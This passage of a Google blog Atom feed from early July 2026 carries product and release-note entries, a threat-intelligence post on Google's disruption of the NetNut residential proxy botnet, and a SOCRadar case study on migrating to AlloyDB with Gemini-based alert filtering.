more&lt;/a&gt;.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Work with delegated Gmail accounts from mobile devices&lt;/h3&gt;&lt;p&gt;Previously, users could only work with delegated Gmail accounts through the web interface. We are updating the Gmail app for iOS and Android to allow delegates to read, manage, and compose emails on behalf of a delegator directly from their mobile devices. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/work-with-delegated-gmail-accounts-from-mobile-devices.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;AI Overviews in Drive now available on mobile&lt;/h3&gt;&lt;p&gt;In April, we announced the general availability for Drive AI Overviews in Drive on the web. We’re now bringing this feature to the Drive Android and iOS apps. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/ai-overviews-in-drive-now-available-on-mobile.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Import 3D bar charts into Google Sheets&lt;/h3&gt;&lt;p&gt;Google Sheets now fully supports the import of 3D bar charts. Previously, when users imported files containing 3D bar charts into Sheets, they would be displayed as 2D bar charts. With this update, importing these types of files, including from Microsoft Excel, will yield a more seamless experience. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/import-3d-bar-charts-into-google-sheets.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;&lt;span style="font-size: x-small;"&gt;The announcements above were published on the Workspace Updates blog over the last week. Please refer to the original blog posts for complete details.&lt;/span&gt;&lt;/p&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/07/weekly-recap-07-03-2026.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-07-03T19:31:10+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/platforms/google-play/indie-games-fund-africa</id>
    <title>We're investing $1 million in Africa's indie game developers.</title>
    <updated>2026-07-03T16:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/indiegamesfund_socialshare.max-600x600.format-webp.webp" /&gt;Sub-Saharan Africa is home to incredible storytelling, which fuels the game development scene in what is one of the world's fastest-growing gaming markets. But while the…</content>
    <link href="https://blog.google/products-and-platforms/platforms/google-play/indie-games-fund-africa" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-03T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://deepmind.google/blog/google-deepmind-and-a24-announce-first-of-its-kind-research-partnership</id>
    <title>Google DeepMind and A24 announce first-of-its-kind research partnership</title>
    <updated>2026-07-03T14:25:43+00:00</updated>
    <link href="https://deepmind.google/blog/google-deepmind-and-a24-announce-first-of-its-kind-research-partnership" rel="alternate"/>
    <category term="Google DeepMind"/>
    <published>2026-07-03T14:25:43+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#July_03_2026</id>
    <title>Cloud Release Notes — July 03, 2026</title>
    <updated>2026-07-03T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Cloud CDN&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Cloud CDN and external Application Load Balancers support self-service
Private Bucket Access for Cloud Storage buckets. This feature allows you to
securely serve content without making your storage buckets public. The access
on the buckets is managed securely via IAM permissions on a Google-managed
service account. This feature is &lt;strong&gt;Generally Available&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/cdn/docs/setting-up-cdn-with-bucket#enable_private_bucket_access"&gt;Private bucket access&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#July_03_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-07-03T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/threat-intelligence/google-continued-disruption-residential-proxy-networks</id>
    <title>Google’s Continued Disruption of Malicious Residential Proxy Networks</title>
    <updated>2026-07-02T14:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Background&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Today, in coordination with the FBI, Lumen, and others, Google took action against the NetNut residential proxy network, also known as Popa. This action builds on our &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/disrupting-largest-residential-proxy-network"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;disruption of the IPIDEA proxy network&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; that took place in January 2026, and is a continuation of Google’s objective to dismantle malicious residential proxy networks.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Actions Taken&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As a part of this disruption we took the following actions:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Disabled Google accounts and associated Google services used by NetNut for malware command and control (C2), which directly violates Google’s Terms of Service and Acceptable Use Policy. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Shared technical intelligence on NetNut software development kits (SDKs) and backend C2 infrastructure with platform providers, law enforcement, and research firms to help drive ecosystem-wide awareness and enforcement.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We ensured &lt;/span&gt;&lt;a href="https://support.google.com/googleplay/answer/2812853?hl=en" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Play Protect&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, Android’s built-in security protection, automatically warned users and disabled applications known to incorporate NetNut SDKs, and the system will continue to protect users against future install attempts. These efforts to help keep the broader digital ecosystem safe supplement the protections we have to safeguard Android users on certified devices.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We believe our coordinated actions have caused significant degradation to NetNut’s proxy network and its business operations,&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; reducing the available pool of devices for the proxy operator by millions&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. In addition to selling access to the network under the NetNut brand, NetNut has a robust reseller program that allows whitelabeling of its network. Google has high confidence that many popular residential proxy brands are in fact whitelabeling the NetNut botnet. While we expect this disruption to have a larger ripple effect across the residential proxy ecosystem, observations after the disruption of IPIDEA proved that individual networks can appear resilient. What we have observed is that when faced with the degradation of their own botnet, proxy operators begin buying capacity from their competitors, effectively becoming a reseller. We recognize that creating a lasting disruption in this fluid ecosystem means we must scale our efforts to target the infrastructure of several interconnected providers. We will continue to observe the composition of the NetNut network and map out how its peers adapt to this action.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Why it Matters&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;NetNut is among the largest and most popular residential proxy networks. Estimating the size of residential proxy networks is extremely challenging, but Google Threat Intelligence Group (GTIG) estimates the size of the NetNut network to be at least 2 million devices, distributed across the world. Public reporting by &lt;/span&gt;&lt;a href="https://krebsonsecurity.com/2026/06/popa-botnet-linked-to-publicly-traded-israeli-firm/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;KrebsOnSecurity&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and others, confirmed by Google, illustrates that NetNut populates its botnet by distributing SDKs for devices commonly found in homes, such as smart TVs and streaming boxes. GTIG has also identified NetNut botnet plugin components for large-scale botnets such as Badbox 2.0.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Residential proxy networks sell the ability to route traffic through IP addresses owned by internet service providers (ISPs), allowing attackers to mask malicious activity by hijacking these IP addresses. A robust residential proxy network requires controlling millions of residential IP addresses to sell to customers for use. To accomplish this, operators need code running on home devices to enroll them into the malicious network as &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;exit nodes.&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; Home devices become part of proxy networks either because they are pre-installed with malware before purchase or because users unknowingly download applications containing hidden proxy code. This creates serious risks for unsuspecting device owners, as their home IP addresses can be used by attackers as a launchpad for hacking and other unauthorized activities. Consequently, users can have their legitimate traffic flagged as suspicious, or blocked by their service providers.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In a single week during June 2026, GTIG observed 316 distinct threat clusters using suspected NetNut exit nodes, including cybercriminal and espionage groups. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;These bad actors can use NetNut to mask their origin IP address when accessing victim environments, accessing their own infrastructure, and conducting password spray attacks. Furthermore, when a consumer device becomes an exit node, unauthorized network traffic passes through it. This means bad actors can access other private devices on the same home network, effectively exposing them to Internet threats. Public reports by &lt;/span&gt;&lt;a href="https://synthient.com/blog/who-are-the-victims-of-residential-proxies" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Synthient&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://spur.us/blog/residential-proxy-lateral-movement-risk" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Spur&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://github.com/deepfield/public-research/blob/main/reports/2026-06-18-robovpn-neunative.md" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Nokia Deepfield&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and others have documented the use of NetNut to infect devices with variants of Mirai DDoS botnets.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Empowering and Protecting Consumers&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Consumers should be extremely wary of applications that offer payment in exchange for "unused bandwidth" or "sharing your internet." These applications are primary ways for malicious proxy networks to grow, and could open security vulnerabilities on the device’s home network. We urge users to stick to official app stores, review permissions for third-party VPNs and proxies, and ensure built-in security protections like &lt;/span&gt;&lt;a href="https://support.google.com/googleplay/answer/2812853?hl=en" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Play Protect&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; are active.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Consumers should be careful when purchasing connected devices, such as set top boxes, to make sure they are from reputable manufacturers. For example, to help you confirm whether or not a device is built with the official Android TV OS and Play Protect certified, our &lt;/span&gt;&lt;a href="https://www.android.com/tv/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Android TV website&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;provides the most up-to-date list of partners. You can also take&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;a href="https://support.google.com/googleplay/answer/7165974" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;these steps&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;to check if your Android device is Play Protect certified.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Future Work&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As we noted earlier this year, the residential proxy industry appears to be rapidly expanding, and this coordinated disruption is not the end of our work combating malicious residential proxy networks. This industry is deeply connected and operators depend on overlapping botnet networks that are constantly resold. While point-in-time disruptions are a critical tool to protect our users, continued and coordinated effort is needed to reduce malicious proxy networks in the long run. We encourage mobile platforms, ISPs, and other tech platforms to continue sharing intelligence and to take direct action to block malicious C2 infrastructure.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/threat-intelligence/google-continued-disruption-residential-proxy-networks" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-02T14:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://googlecloudpresscorner.com/2026-07-02-Intesa-Sanpaolo-Brings-its-Digital-Infrastructure-to-Google-Cloud-Regions-in-Italy-Hosted-in-TIMs-Data-Centers</id>
    <title>Intesa Sanpaolo Brings its Digital Infrastructure to Google Cloud Regions in Italy Hosted in TIM's Data Centers</title>
    <updated>2026-07-02T08:00:00+00:00</updated>
    <link href="https://googlecloudpresscorner.com/2026-07-02-Intesa-Sanpaolo-Brings-its-Digital-Infrastructure-to-Google-Cloud-Regions-in-Italy-Hosted-in-TIMs-Data-Centers" rel="alternate"/>
    <category term="Google Cloud Press"/>
    <published>2026-07-02T08:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#July_02_2026</id>
    <title>Cloud Release Notes — July 02, 2026</title>
    <updated>2026-07-02T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;NetApp Volumes&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;The Flex Unified service level supports the optional feature &lt;a href="https://docs.cloud.google.com/netapp/volumes/docs/configure-and-use/volumes/overview#block-volume-deletion"&gt;Block volume from deletion when clients are connected&lt;/a&gt; for both block and file volumes. This option is
required for using NetApp Volumes with Google Cloud VMware Engine (GCVE)
datastores. When this option is enabled, it prevents the deletion of a volume if
the volume is mounted as a GCVE datastore.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Oracle Database@Google Cloud&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Oracle Database@Google Cloud supports Exascale Storage Vaults for Exadata on Dedicated Infrastructure and Exadata VM Clusters. For more information, see &lt;a href="https://docs.cloud.google.com/oracle/database/docs/create-exadata-storage-vaults"&gt;Create an Exascale Storage Vault for an Exadata Infrastructure&lt;/a&gt;, &lt;a href="https://docs.cloud.google.com/oracle/database/docs/configure-exascale-storage"&gt;Configure Exascale Storage Vault for Exadata Infrastructure&lt;/a&gt;, and &lt;a href="https://docs.cloud.google.com/oracle/database/docs/create-clusters#create-cluster-using-vault"&gt;Create Exadata VM Clusters with Exascale Storage Vaults&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This feature is &lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;Generally Available (GA)&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#July_02_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-07-02T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/databases/socradar-powers-rapid-threat-detection-with-alloydb-and-gemini-enterprise</id>
    <title>SOCRadar powers rapid threat detection with AlloyDB and Gemini Enterprise</title>
    <updated>2026-07-01T19:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="font-style: italic; vertical-align: baseline;"&gt;Editor’s note:&lt;/strong&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; SOCRadar is a leading cybersecurity company that provides threat intelligence to businesses worldwide. As the volume of cyber threats continued to grow, SOCRadar needed to modernize its data infrastructure to deliver faster insights to its customers. By migrating from PostgreSQL to AlloyDB, SOCRadar achieved a 20x performance boost, reduced operational overhead, and is now better positioned to innovate and grow.&lt;/span&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;How SOCRadar supercharges rapid threat detection with AlloyDB &lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://socradar.io/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;SOCRadar&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; provides external threat intelligence to help organizations across 30+ countries defend against cyberattacks. On the front lines of cybersecurity, timely intelligence is everything and a delay of a few minutes can mean the difference between a blocked exploit and a full-scale breach.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As SOCRadar’s business scaled and cyber threat volumes exploded, their on-premises, self-managed PostgreSQL database hit a wall. The database simply couldn't keep pace with the simultaneous demands of high-velocity data ingestion and heavy, real-time analytical queries. This created a severe data bottleneck, slowing down the delivery of critical insights to customers and pulling engineers away from innovation to focus on constant manual database tuning.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Evaluating database alternatives: The hunt for scalability&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The engineering team realized their traditional PostgreSQL environment had reached its absolute performance limits. To scale, SOCRadar needed a high-performance fully managed database that could dramatically slash operational overhead while elegantly handling a complex, hybrid workload.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;They evaluated alternatives and selected Google Cloud's &lt;/span&gt;&lt;a href="https://cloud.google.com/alloydb"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AlloyDB for PostgreSQL&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Because AlloyDB is fully PostgreSQL-compatible, it offered a low-risk migration path while promising a specialized architecture built to handle both high-volume transactions and real-time analytics simultaneously. To accelerate the transition, SOCRadar partnered with NGC, a Premier Business Partner, who meticulously validated the architecture before executing a precision cutover with minimal downtime.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Taming a "triple-threat" workload&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Migrating to AlloyDB transformed how SOCRadar processes massive, diverse cyber telemetry. Today, AlloyDB effortlessly manages what SOCRadar’s engineering team calls a &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;"triple-threat" query environment&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, maintaining sub-second lookup latency even as processing volumes scale.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To understand the performance leaps, it helps to separate the system’s velocity (handling live data streams) from its depth (analyzing historical data):&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;High-Velocity Transactional Ingestion (OLTP):&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The platform constantly ingests real-time telemetry from thousands of disparate, fast-moving sources—including Dark Web forums, botnet logs, and social media feeds. AlloyDB handles these continuous INSERT and UPSERT operations with a &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;3.2x boost in live ingestion velocity&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, ensuring that the newest threat indicators are immediately recorded and available for detection.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Real-Time Operational Point-Reads:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; When a security analyst is actively investigating a live incident, speed is everything. Baseline performance testing under zero-load conditions for random ID lookups on indexed fields (e.g., querying a specific Indicator of Compromise by ID) showed that standard queries requiring 3 to 3.5 seconds were completed in just 1 second on AlloyDB.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Deep Analytical Aggregations (OLAP):&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; When a client requests a complex sectoral report such as correlating the most prevalent attack vectors in the finance sector over an entire year, the database must execute deep scans across vast historical datasets. Leveraging AlloyDB’s built-in &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/columnar-engine/about"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;In-Memory Columnar Engine&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, these analytical queries run &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;up to 20x faster&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; than standard PostgreSQL.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;More than just speed: Reclaiming 45 TB and 75% of DBA time&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While the raw performance gains were massive, the operational and financial impact completely changed how SOCRadar's engineering team works day-to-day.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Thanks to AlloyDB's advanced automation, including intelligent memory management and write-ahead log (WAL) optimization, the need for constant, manual database tuning evaporated. The database administrator's (DBA) workload dropped significantly, requiring a system health check just “about once every two or three days." This freed up &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;75% of SOCRadar’s DBA resources&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, allowing them to pivot away from maintenance and focus entirely on core platform innovation.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Financially, AlloyDB’s dynamic storage management solved a massive cost efficiency issue. Unlike traditional database environments that lock you into paying for fixed, provisioned storage even after data is purged, AlloyDB automatically scales storage down to match actual data footprints. By clearing out legacy, unnecessary logs, SOCRadar was able to instantly &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;reclaim over 45 TB of storage&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, achieving massive, automated cost optimization.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Fighting alert fatigue with integrated Gemini Enterprise Agent Platform&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Beyond scaling infrastructure, AlloyDB has allowed SOCRadar to redefine the core architecture of their threat response using artificial intelligence.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Security operations centers (SOCs) globally are plagued by "alert fatigue"—the sheer volume of security alarms makes it easy to miss a critical attack. To solve this, SOCRadar integrated Gemini Enterprise Agent Platform&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;as a core component of their solution architecture, linking it directly to their Alarm Management framework running on AlloyDB.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By running Gemini AI-native filtering directly on their active data workloads, SOCRadar can automatically distinguish between true positives and benign false alarms. The AI categorizes, filters, and routes alerts before they ever reach the end-user. This ensures security analysts are insulated from noise and receive only the most critical, validated, and actionable intelligence.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By running Gemini AI-native filtering directly on their active data workloads, SOCRadar can automatically distinguish between true positives and benign false alarms. The AI categorizes, filters, and routes alerts before they ever reach the end-user. This ensures security analysts are insulated from noise and receive only the most critical, validated, and actionable intelligence, laying the groundwork for fully autonomous security operations.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Expanding capabilities: The future of agentic threat hunting&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With a high-performance foundation firmly established, SOCRadar’s dedicated AI team is transitioning from passive analytics to active automation. The company is currently testing &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Agentic AI workloads&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, with plans to roll them into production in subsequent phases.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By integrating &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Real-time Data Agents with Gemini Enterprise and AlloyDB&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, SOCRadar is transforming with autonomous agents that don't just store data, but actively hunt threats, reason over context, and take action. Their upcoming production roadmap includes:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Natural Language Querying (NLQ):&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Allowing analysts to conduct rapid threat hunting using conversational language, lowering the technical barrier to querying massive database sets.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Intelligent Semantic Similarity Search:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Leveraging native vector embeddings and Gemini Enterprise to allow Data Agents to independently surface hidden patterns across historical logs that traditional keyword searches would miss.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Automated Incident Summarization:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Instantly transforming hundreds of lines of complex, deeply technical logs into concise, plain-language executive summaries for security analysts during critical incidents.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By consolidating transactional velocity, historical depth, and built-in AI intelligence into a unified platform, SOCRadar has eliminated its data bottlenecks and built a highly automated, future-proof framework for global cybersecurity defense.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Ready to modernize your database infrastructure? &lt;/span&gt;&lt;a href="https://cloud.google.com/alloydb"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;AlloyDB&lt;/span&gt;&lt;/a&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; provides a fully managed, PostgreSQL-compatible database with high performance for transactional, analytical, and AI workloads. &lt;/span&gt;&lt;a href="https://cloud.google.com/alloydb"&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;Learn how&lt;/span&gt;&lt;/a&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; you can reduce costs, eliminate management overhead, and build intelligent applications.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/databases/socradar-powers-rapid-threat-detection-with-alloydb-and-gemini-enterprise" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-01T19:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/android-enterprise/b3-android-enterprise</id>
    <title>Why B3 chose Android for secure AI-enabled productivity</title>
    <updated>2026-07-01T19:00:00+00:00</updated>
    <content type="html">Collage of: 3 people looking at an Android phone, Android icons, two Android phones, and the text "Device enrolled"</content>
    <link href="https://blog.google/products-and-platforms/products/android-enterprise/b3-android-enterprise" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-01T19:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/technology/ai/google-ai-updates-june-2026</id>
    <title>The latest AI news we announced in June 2026</title>
    <updated>2026-07-01T18:15:00+00:00</updated>
    <content type="html">June Pixel Drop hero</content>
    <link href="https://blog.google/innovation-and-ai/technology/ai/google-ai-updates-june-2026" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-01T18:15:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/databases/boost-performance-and-lower-costs-with-alloydb-ai-functions</id>
    <title>AlloyDB AI Functions - now with revolutionary performance boosts and cost savings</title>
    <updated>2026-07-01T18:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;a href="https://cloud.google.com/products/alloydb"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AlloyDB&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is an AI-native database—it isn’t just a passive data store, it intelligently understands and processes your data. With AlloyDB, you get industry-leading vector and hybrid search, near 100% accurate &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/databases/introducing-querydata-for-near-100-percent-accurate-data-agents?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;natural language-to-SQL capabilities&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to build conversational agents, tools to enable you to &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/databases/managed-mcp-servers-for-google-cloud-databases?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;build with your agentic IDEs of choice&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: 